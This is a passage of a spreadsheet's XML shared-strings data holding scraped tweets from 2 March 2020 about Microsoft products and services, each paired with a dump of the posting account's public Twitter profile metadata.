'geo_enabled': False, 'verified': False, 'statuses_count': 4071,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'http://pbs.twimg.com/profile_images/684104058873982976/s1FZwCqH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/684104058873982976/s1FZwCqH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4354197195/1471951752',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</si>
  <si>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10:46:57 +0000 2020</t>
  </si>
  <si>
    <t>Check Out Our All Ready Slides: https://t.co/Eo6413gLSQ
A great collection of beautiful presentation templates for your need. Choose the best suitable template and start customizing it!
#powerpoint #presentation #templates #ppt #microsoft #pitch #deck #story #teller #success #up https://t.co/CVEPpwHK0x</t>
  </si>
  <si>
    <t>{'id': 3742728793, 'id_str': '3742728793', 'name': 'SlideDesigning.com ðŸ’¡ PowerPoint TemplatesðŸš€ðŸ“ŠðŸ’ŽðŸŒŽ', 'screen_name': 'SlideDesigning', 'location': 'World', 'description': 'ðŸ’ŽBeautifully designed, Fully editable presentation templates ðŸ—ºï¸ World-Class Presentations\nâœï¸ Unlock Your Creativity\nðŸ’µ Save Money \nâ³ Save Time \nðŸ–¥ï¸ PowerPoint', 'url': 'https://t.co/WgVDBGFoMX', 'entities': {'url': {'urls': [{'url': 'https://t.co/WgVDBGFoMX', 'expanded_url': 'http://bit.ly/2DIu8e6', 'display_url': 'bit.ly/2DIu8e6', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3861, 'friends_count': 3949, 'listed_count': 27, 'created_at': 'Thu Oct 01 01:19:06 +0000 2015', 'favourites_count': 19429, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1429,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'http://pbs.twimg.com/profile_images/1232324610521059332/oNn2UbzB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232324610521059332/oNn2UbzB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3742728793/1582811632', 'profile_link_color': '0CB4CE',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</si>
  <si>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10:45:10 +0000 2020</t>
  </si>
  <si>
    <t>It was fascinating seeing the closing keynote with Nick Wallace, Commercial Director at @Azure at #Oracle #OpenWorld #London.  He was discussing the compatibility with various software's. 
#OOWLON #Microsoft #migration #Azure #ERP #OracleContractors https://t.co/DuL3j4e5PB</t>
  </si>
  <si>
    <t>{'id': 2860299101, 'id_str': '2860299101', 'name': 'Oracle Contractors', 'screen_name': 'Oracle_Global', 'location': 'UK, USA, Ireland.', 'description': '#Recruitment Agency #OracleContractors is a market-leading &amp; specialist supplier of independent #Oracle Professionals. #Recruiting #Contractors Internationally.', 'url': 'https://t.co/gqfnMBGFiP', 'entities': {'url': {'urls': [{'url': 'https://t.co/gqfnMBGFiP', 'expanded_url': 'http://www.oraclecontractors.com', 'display_url': 'oraclecontractors.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1034, 'friends_count': 1696, 'listed_count': 25, 'created_at': 'Tue Nov 04 10:23:14 +0000 2014', 'favourites_count': 875, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2090,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'http://pbs.twimg.com/profile_images/1212393938843250690/dqpJXBcy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212393938843250690/dqpJXBcy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2860299101/1577892225',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</si>
  <si>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10:44:25 +0000 2020</t>
  </si>
  <si>
    <t>The #Microsoft  #surface  speaker quality has been  one of the most amazing discoveries of this trip. There are times when you need a room filled with familiar sounds, with a soothing quality. #travelwriting #sustainabletravel https://t.co/es9OxhT2L0</t>
  </si>
  <si>
    <t>{'id': 16033369, 'id_str': '16033369', 'name': 'Colin Noden', 'screen_name': 'ColinNoden', 'location': 'OrlÃ©ans, Ontario, Canada', 'description': 'Copywriter &amp; Traveler, Insatiable Researcher. Having fun as a Google Local Guide!', 'url': 'https://t.co/8YjSQo06mb', 'entities': {'url': {'urls': [{'url': 'https://t.co/8YjSQo06mb', 'expanded_url': 'https://www.google.com/+ColinNoden', 'display_url': 'google.com/+ColinNoden', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 923, 'friends_count': 489, 'listed_count': 41, 'created_at': 'Thu Aug 28 21:49:06 +0000 2008', 'favourites_count': 2008, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2786,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'http://pbs.twimg.com/profile_images/2634485215/f1cad96512de9bd8ec347ca50ddc2a60_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2634485215/f1cad96512de9bd8ec347ca50ddc2a60_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16033369/1403021421',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</si>
  <si>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Mon Mar 02 10:38:50 +0000 2020</t>
  </si>
  <si>
    <t>Are you a Microsoft Edu Partner using SDS in your digital school transformations?
#microsoftteams #microsoftpartners #office365 #m365 #microsoftedu #microsoft #minecraft #onenote #microsofttraining #msftadvocate #azure #teachingan...https://t.co/RK3b3WZcY8 https://t.co/PFpd0cRWxo</t>
  </si>
  <si>
    <t>{'id': 1090915006105952256, 'id_str': '1090915006105952256', 'name': 'Rosie Slack', 'screen_name': 'MicrosoftRosie', 'location': 'England, United Kingdom', 'description': 'Microsoft Product Manager at Exertis UK. \nL1 CrossFit Coach. \nLover of food, gaming, and travel. \nTweets and opinions are my own.', 'url': 'https://t.co/mhljckzy3g', 'entities': {'url': {'urls': [{'url': 'https://t.co/mhljckzy3g', 'expanded_url': 'https://www.linkedin.com/in/rosie-slack-765187a9/', 'display_url': 'linkedin.com/in/rosie-slackâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 42, 'listed_count': 0, 'created_at': 'Thu Jan 31 10:09:40 +0000 2019', 'favourites_count': 19, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1090915383639506947/bveQS3qb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1090915383639506947/bveQS3qb_normal.jpg',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</si>
  <si>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10:38:00 +0000 2020</t>
  </si>
  <si>
    <t>Good news!
#Python #Excel #Microsoft
https://t.co/JTfugpDzry</t>
  </si>
  <si>
    <t>{'id': 1084825825449521152, 'id_str': '1084825825449521152', 'name': 'Sergey Kubarev', 'screen_name': 'SergeyKubarev', 'location': '', 'description': 'Experienced financial analyst. Aspiring data scientist.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 827, 'friends_count': 868, 'listed_count': 3, 'created_at': 'Mon Jan 14 14:53:26 +0000 2019', 'favourites_count': 1423, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 142, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1145098268189306882/SA3G6bkk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145098268189306882/SA3G6bkk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1084825825449521152/1549226673',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</si>
  <si>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10:34:04 +0000 2020</t>
  </si>
  <si>
    <t>MS Teams app to display intranet works on mobile client but not on Windows
https://t.co/YcNlhBJqOO
#microsoft-teams #manifest.json</t>
  </si>
  <si>
    <t>{'id': 4614862275, 'id_str': '4614862275', 'name': 'StackOverflow Bot', 'screen_name': 'soiqbot', 'location': '', 'description': 'Recently active questions from https://t.co/P7MEYPpnIf | Python based bot by @vgan running on AWS Lambda', 'url': 'https://t.co/46cLmyO5Qo', 'entities': {'url': {'urls': [{'url': 'https://t.co/46cLmyO5Qo', 'expanded_url': 'https://github.com/vgan/soiqbot', 'display_url': 'github.com/vgan/soiqbot', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/P7MEYPpnIf', 'expanded_url': 'http://stackoverflow.com', 'display_url': 'stackoverflow.com', 'indices': [31, 54]}]}}, 'protected': False, 'followers_count': 550, 'friends_count': 19, 'listed_count': 592, 'created_at': 'Sat Dec 26 21:55:09 +0000 2015', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 39146,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'http://pbs.twimg.com/profile_images/680887029845110784/iWdan2Gf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/680887029845110784/iWdan2Gf_normal.jpg',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</si>
  <si>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10:30:07 +0000 2020</t>
  </si>
  <si>
    <t>Outbound Spam Filtering  Microsoft Finally Gets On Board
https://t.co/VppGn7E81m
#spam #Microsoft #email https://t.co/U7QaxKXXnU</t>
  </si>
  <si>
    <t>{'id': 2927913702, 'id_str': '2927913702', 'name': 'Duo Circle', 'screen_name': 'duocirclellc', 'location': '', 'description': '', 'url': 'https://t.co/uqz9bf8Y6s', 'entities': {'url': {'urls': [{'url': 'https://t.co/uqz9bf8Y6s', 'expanded_url': 'https://www.duocircle.com', 'display_url': 'duocircle.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 105, 'friends_count': 324, 'listed_count': 1, 'created_at': 'Sat Dec 13 01:18:09 +0000 2014', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1294,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'http://pbs.twimg.com/profile_images/543575704793649152/SieU4mZ8_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/543575704793649152/SieU4mZ8_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2927913702/1461191526',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</si>
  <si>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10:28:53 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge Now Lets You Block Potentially Unwanted Programs https://t.co/1FEOH72XcO Cover page article from Meta's BigEye Cyber Edition @BleepinComputer #microsoft</t>
  </si>
  <si>
    <t>{'id': 1241947765, 'id_str': '1241947765', 'name': 'Meta Intelligence', 'screen_name': 'META_INT3L', 'location': '', 'description': 'Intelligence in the Cyberspace Domain', 'url': 'http://t.co/KRohNZreoj', 'entities': {'url': {'urls': [{'url': 'http://t.co/KRohNZreoj', 'expanded_url': 'http://www.meta-intelligence.com', 'display_url': 'meta-intelligence.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 33, 'friends_count': 62, 'listed_count': 2, 'created_at': 'Mon Mar 04 18:32:50 +0000 2013', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4036,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'http://pbs.twimg.com/profile_images/459033007878205440/MXvqaI4I_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/459033007878205440/MXvqaI4I_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1241947765/1398277225',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</si>
  <si>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10:27:30 +0000 2020</t>
  </si>
  <si>
    <t>Want to understand Azure HDInsight training / Big Data Services in Microsoft Azure?
Read more : https://t.co/8y3Uz4AM14
Register Here : https://t.co/R1UIlJ35UD
#azure #microsoftazure #Bigdata #AzureHDinsight #Microsoft #StarweaverGroup https://t.co/N3etuLMEEE</t>
  </si>
  <si>
    <t>{'id': 49144677, 'id_str': '49144677', 'name': 'Starweaver Group', 'screen_name': 'starweavergroup', 'location': 'San Francisco, CA', 'description': "We deliver superlative, hands-on and practical professional development and education. That's it!!\n#Starweaver #StarweaverGroup\nhttps://t.co/ARXiAbrhfj", 'url': 'https://t.co/cexrU77UwX', 'entities': {'url': {'urls': [{'url': 'https://t.co/cexrU77UwX', 'expanded_url': 'https://www.starweaver.com', 'display_url': 'starweaver.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ARXiAbrhfj', 'expanded_url': 'http://bit.ly/2HAPSdg', 'display_url': 'bit.ly/2HAPSdg', 'indices': [128, 151]}]}}, 'protected': False, 'followers_count': 49, 'friends_count': 26, 'listed_count': 8, 'created_at': 'Sat Jun 20 22:38:26 +0000 2009', 'favourites_count': 32, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 206,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'http://pbs.twimg.com/profile_images/1054422450807558144/0x5VnVDw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1054422450807558144/0x5VnVDw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/49144677/1463609921',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</si>
  <si>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10:24:49 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Nice move, #Microsoft: after setting up business #Skype account, using it once and not starting it for a week, my account got locked. Had to provide phone number to unlock. #privacy </t>
  </si>
  <si>
    <t>{'id': 72581281, 'id_str': '72581281', 'name': 'Karl Voit', 'screen_name': 'n0v0id', 'location': 'Austria', 'description': 'My Mastodon ðŸ˜ profile: https://t.co/BvXdjCfRWW - follow me there!\nPIM, privacy, decentralization, Emacs, Orgmode, bicycle, Graz', 'url': 'http://t.co/E74DJwvGBJ', 'entities': {'url': {'urls': [{'url': 'http://t.co/E74DJwvGBJ', 'expanded_url': 'http://Karl-Voit.at', 'display_url': 'Karl-Voit.at', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/BvXdjCfRWW', 'expanded_url': 'http://www.karl-voit.at/2017/11/26/Mastodon/', 'display_url': 'karl-voit.at/2017/11/26/Masâ€¦', 'indices': [23, 46]}]}}, 'protected': False, 'followers_count': 774, 'friends_count': 132, 'listed_count': 191, 'created_at': 'Tue Sep 08 15:34:26 +0000 2009', 'favourites_count': 703, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 32706,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'http://pbs.twimg.com/profile_images/937285934176972800/NVFayv5y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/937285934176972800/NVFayv5y_normal.jpg',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</si>
  <si>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Mon Mar 02 10:19:08 +0000 2020</t>
  </si>
  <si>
    <t>Customize &amp;amp; design a form using #PowerApps designer &amp;amp; bind data with controls and then save the data back to #SharePoint Online list. 
Learn more: https://t.co/WLuclA4EZb
#technology #microsoft #data  #exquitech https://t.co/gecF5FUOwi</t>
  </si>
  <si>
    <t>Mon Mar 02 10:16:54 +0000 2020</t>
  </si>
  <si>
    <t>One of most popular screen of Microsoft Windows. Its spread faster than corona virus. #Microsoft #Windows10 https://t.co/AE57KROAeO</t>
  </si>
  <si>
    <t>{'id': 226528704, 'id_str': '226528704', 'name': 'Sanjib Dey', 'screen_name': 'sanjib_dey3', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 16, 'friends_count': 13, 'listed_count': 1, 'created_at': 'Tue Dec 14 11:42:45 +0000 2010', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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</si>
  <si>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Mon Mar 02 10:16:41 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft may launch Surface Duo sooner than expected 
https://t.co/PhJznkuq8x 
#SurfaceDuo  #Microsoft #foldablesmartphone  #WIPO #5G #Microsoftlaunching #gadget #Snapdragon855processor #insideglobe https://t.co/ZAfSQsVCaL</t>
  </si>
  <si>
    <t>{'id': 1703975618, 'id_str': '1703975618', 'name': 'Inside Globe', 'screen_name': 'InsideGlobe', 'location': 'Singapore', 'description': 'Solving Real Problems Via Technology', 'url': 'http://t.co/TNjRUrbJjE', 'entities': {'url': {'urls': [{'url': 'http://t.co/TNjRUrbJjE', 'expanded_url': 'http://www.insideglobe.com', 'display_url': 'insideglobe.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 151, 'friends_count': 1, 'listed_count': 52, 'created_at': 'Tue Aug 27 07:12:41 +0000 2013', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 782,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'http://pbs.twimg.com/profile_images/1087986746565029888/t3ziFqJl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1087986746565029888/t3ziFqJl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1703975618/1470752199',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</si>
  <si>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Mon Mar 02 10:15:35 +0000 2020</t>
  </si>
  <si>
    <t>@MicrosoftHelps Can you please outline the complaints procedure? It seems customer service investigates complaints about customer service? A little biased perhaps? #Microsoft #CustomerService #customerexperience #confused</t>
  </si>
  <si>
    <t>{'id': 1229396740043935746, 'id_str': '1229396740043935746', 'name': 'Ian McCready', 'screen_name': 'IanMcCready2', 'location': 'Helsinki, Finland', 'description': 'An enthusiast of innovation, entrepreneurial mindset, tech and forward thinking. CCO for Ultrahck, driving innovations and new digital solutions globally.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 42, 'listed_count': 0, 'created_at': 'Mon Feb 17 13:26:48 +0000 2020', 'favourites_count': 1,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'http://pbs.twimg.com/profile_images/1229402257801740291/P4TdQDRs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229402257801740291/P4TdQDRs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1229396740043935746/1581947315',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</si>
  <si>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10:14:52 +0000 2020</t>
  </si>
  <si>
    <t>This was classic 
#nokia #nokiafanclub #android #nokia7 #nokia9 #nokia9pureview #camera #lumia #windows #microsoft #lumia920
@sarvikas @NokiaMobile @nokia_anew @dorso10 @AAS @gsmarena_com https://t.co/1mQEwgxTyK</t>
  </si>
  <si>
    <t>Mon Mar 02 10:14:46 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's new #Cortana #app doesn't know the answer to 2+2   https://t.co/ycaN71DmNA via @pcworld</t>
  </si>
  <si>
    <t>{'id': 2767073855, 'id_str': '2767073855', 'name': 'AngÃ©lique', 'screen_name': 'ange1914', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2125, 'friends_count': 2101, 'listed_count': 1118, 'created_at': 'Thu Sep 11 11:23:17 +0000 2014', 'favourites_count': 116771, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 102824,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'http://pbs.twimg.com/profile_images/531383351199154176/mC01O5tu_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/531383351199154176/mC01O5tu_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2767073855/1421655598', 'profile_link_color': 'FAB81E',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</si>
  <si>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10:14:32 +0000 2020</t>
  </si>
  <si>
    <t>Look Back On 2020 from 2021 and Say: Great year
 https://t.co/1tHsGk3HhO #goal #Careeradvice #success #inspirational #motivation #businessgrowth #Microsoft #Outlook #webinar @DreamCreation55
@SitConsultores @TowerHouseSt @joe_charles @onetoone_global @Empowerment_IE https://t.co/Doe0BS4MXm</t>
  </si>
  <si>
    <t>{'id': 971558672, 'id_str': '971558672', 'name': 'TrainHR', 'screen_name': 'TrainHR1', 'location': 'Fremont, CA', 'description': '#HR Training and Development for #HumanResource Professionals #Trainhr https://t.co/0Klg3aoHK8', 'url': 'https://t.co/pMsPrbBPRD', 'entities': {'url': {'urls': [{'url': 'https://t.co/pMsPrbBPRD', 'expanded_url': 'https://www.facebook.com/pages/Trainhr/1540069582910166', 'display_url': 'facebook.com/pages/Trainhr/â€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/0Klg3aoHK8', 'expanded_url': 'http://www.trainhr.com', 'display_url': 'trainhr.com', 'indices': [71, 94]}]}}, 'protected': False, 'followers_count': 6971, 'friends_count': 7015, 'listed_count': 305, 'created_at': 'Mon Nov 26 08:16:39 +0000 2012', 'favourites_count': 1199, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10592,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'http://pbs.twimg.com/profile_images/2897678268/7fbd61918ea5c0da491436535b52bfa7_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2897678268/7fbd61918ea5c0da491436535b52bfa7_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/971558672/1496908544',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</si>
  <si>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10:10:57 +0000 2020</t>
  </si>
  <si>
    <t>Introducing Our New Partners: Lumos 365 Ltd.
#bigdata #analytics #datascience #data #datawareghana #upstream #oilandgas #energy #Ghana #westafrica #microsoft #businesscentral #lumos365 #erp #finance #SupplyChain https://t.co/UdYh8aYdvn</t>
  </si>
  <si>
    <t>{'id': 770941006963417088, 'id_str': '770941006963417088', 'name': 'Dataware Tech Ghana', 'screen_name': 'datawareghana', 'location': 'Accra, Ghana', 'description': 'Data Storage &amp; Analytics | Cloud and Internet of Things (IoT)', 'url': 'https://t.co/evXbvWJmaI', 'entities': {'url': {'urls': [{'url': 'https://t.co/evXbvWJmaI', 'expanded_url': 'http://www.datawareghana.com', 'display_url': 'datawareghana.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 23, 'friends_count': 100, 'listed_count': 0, 'created_at': 'Wed Aug 31 11:07:14 +0000 2016', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1197132600814518274/9QUp0rVe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197132600814518274/9QUp0rVe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/770941006963417088/1569920887', 'profile_link_color': 'D54E27',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</si>
  <si>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10:10:04 +0000 2020</t>
  </si>
  <si>
    <t>We're apparently 4th most digitally civil in the world. Will this change given the precarious political climate, I wonder #Microsoft #2020DigitalCivilityIndex
https://t.co/zqaSnq7st4</t>
  </si>
  <si>
    <t>{'id': 7508602, 'id_str': '7508602', 'name': 'vernieman', 'screen_name': 'vernieman', 'location': 'ÃœT: 3.1136111,101.6893413', 'description': 'Designer. Content Creator. Techie. Animal lover. Video/photography. Petrolhead. ChelseaFC. Caffeine Bacterium #LenovoIN ðŸ‡²ðŸ‡¾ðŸ“±', 'url': 'https://t.co/2E74fvCqj2', 'entities': {'url': {'urls': [{'url': 'https://t.co/2E74fvCqj2', 'expanded_url': 'http://vernonchan.com', 'display_url': 'vernonchan.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4335, 'friends_count': 2328, 'listed_count': 312, 'created_at': 'Mon Jul 16 15:30:10 +0000 2007', 'favourites_count': 12019, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 86163,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'http://pbs.twimg.com/profile_images/1234046277043679233/UhR-EsoM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234046277043679233/UhR-EsoM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/7508602/1570809017',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</si>
  <si>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Mon Mar 02 10:09:34 +0000 2020</t>
  </si>
  <si>
    <t>New post! Troubleshooting tips for beginners in Windows Server 
https://t.co/38yBwMP4GP
#Microsoft #Windows #WindowServer</t>
  </si>
  <si>
    <t>{'id': 710463721, 'id_str': '710463721', 'name': 'Dan Belmonte', 'screen_name': 'DanGaiden', 'location': 'Barcelona', 'description': 'VMware and Microsoft stuff | Trying to learn the right things in the right way | vBrownbag Member\n#vAnime, #vStreetFighter, and gaming!', 'url': 'https://t.co/POu4gnI8PK', 'entities': {'url': {'urls': [{'url': 'https://t.co/POu4gnI8PK', 'expanded_url': 'http://itgaiden.com', 'display_url': 'itgaiden.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 516, 'friends_count': 328, 'listed_count': 12, 'created_at': 'Sun Jul 22 10:10:07 +0000 2012', 'favourites_count': 15349, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3162, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1212499211062611969/56Y8mSWh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212499211062611969/56Y8mSWh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/710463721/1580207784', 'profile_link_color': 'CA2220',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</si>
  <si>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10:05:39 +0000 2020</t>
  </si>
  <si>
    <t>Bytes have developed a new #Cloud Invoice Format for #Microsoft #CSP Services. You now have the option to have two separate consolidated invoices, one for #Azure Services and one for Online Services. 
Speak to your Bytes Account Manager to learn more https://t.co/JMXNCWNpcq</t>
  </si>
  <si>
    <t>Mon Mar 02 10:01:11 +0000 2020</t>
  </si>
  <si>
    <t>Simplify and Modernize your #business and increase employee productivity and efficiency with the best #Microsoft #software. #Genx system brings comprehensive range of #MicrosoftSoftware such as Microsoft #Window10, #Office2019, #server2016, #Office365
: https://t.co/4vCMJKx70N https://t.co/eAFy99KqBg</t>
  </si>
  <si>
    <t>{'id': 885111839616520192, 'id_str': '885111839616520192', 'name': 'GenxSystem', 'screen_name': 'genx_system', 'location': 'Dubai, United Arab Emirates', 'description': 'Genx Systems is incorporated with the aim of providing economic solutions to the ever-increasing IT demands of organization', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 116, 'friends_count': 869, 'listed_count': 0, 'created_at': 'Wed Jul 12 12:21:21 +0000 2017', 'favourites_count': 38, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 663, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/885112258346467328/UTpfit01_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/885112258346467328/UTpfit01_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/885111839616520192/1501229051',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</si>
  <si>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10:00:37 +0000 2020</t>
  </si>
  <si>
    <t>Meet your #Microsoft legal counsel here https://t.co/ZRr6Bj1ahH #MSPartners #LegalService #CommercialLaw https://t.co/G9wmU4TfQ2</t>
  </si>
  <si>
    <t>Mon Mar 02 10:00:30 +0000 2020</t>
  </si>
  <si>
    <t>[Blog Post] #Veeam Multi #Cloud Strategy: Strong partnership with public cloud providers such as #Microsoft #Azure and #Amazon #AWS. #VeeamVanguard https://t.co/sfi8u234XY</t>
  </si>
  <si>
    <t>Mon Mar 02 10:00:27 +0000 2020</t>
  </si>
  <si>
    <t>Cortana in the upcoming Windows 10 release: focused on your productivity with enhanced security and privacy https://t.co/CLiRbWwlFV #microsoft #feedly</t>
  </si>
  <si>
    <t>Mon Mar 02 10:00:21 +0000 2020</t>
  </si>
  <si>
    <t>Still using on-prem email servers? WHY! Get in touch today to discover the benefits of moving your organisations mail services to office 365.
#microsoft #happymonday #cloud #migration #consultancy https://t.co/fSyDMmnc5B</t>
  </si>
  <si>
    <t>{'id': 517755410, 'id_str': '517755410', 'name': 'Aonix Limited', 'screen_name': 'AonixLimited', 'location': '', 'description': 'Aonix Ltd provides integrated communication &amp; collaboration solutions based upon advanced Technology, Marketing &amp; Media Telecommunications solutions.', 'url': 'http://t.co/jlYlgFBsvK', 'entities': {'url': {'urls': [{'url': 'http://t.co/jlYlgFBsvK', 'expanded_url': 'http://www.aonixlimited.com', 'display_url': 'aonixlimited.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 286, 'friends_count': 514, 'listed_count': 19, 'created_at': 'Wed Mar 07 16:52:19 +0000 2012', 'favourites_count': 160, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 592,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'http://pbs.twimg.com/profile_images/576348783048445952/ceUFKMLn_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/576348783048445952/ceUFKMLn_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/517755410/1474884995', 'profile_link_color': '0B0B61',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</si>
  <si>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Mon Mar 02 10:00:10 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/7CVUqBsDyN, its great to see that the #Vatican is not only keeping up with modern times but also understanding the potential risks of advanced AI. @HCICT_SteveH @mmsherpa @Highlands_JSY  @Jay_Highlands  #HCICT #AI #programming #Microsoft #IBM</t>
  </si>
  <si>
    <t>{'id': 1176450194680033280, 'id_str': '1176450194680033280', 'name': 'Bite', 'screen_name': 'HcictH', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 64, 'listed_count': 1, 'created_at': 'Tue Sep 24 10:56:15 +0000 2019', 'favourites_count': 151, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 49, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1197514556911828993/QTyv2Lw__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197514556911828993/QTyv2Lw__normal.jpg',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</si>
  <si>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10:00:08 +0000 2020</t>
  </si>
  <si>
    <t>Have you made the move to Microsoft Teams? 
Teams is a chat-based workspace on Office 365, similar to services such as Slack or WhatsApp. It provides a workspace for groups to collaborate using a familiar instant messaging interface. #Technology #Microsoft #IT #Telecoms https://t.co/lzXcF0n8TF</t>
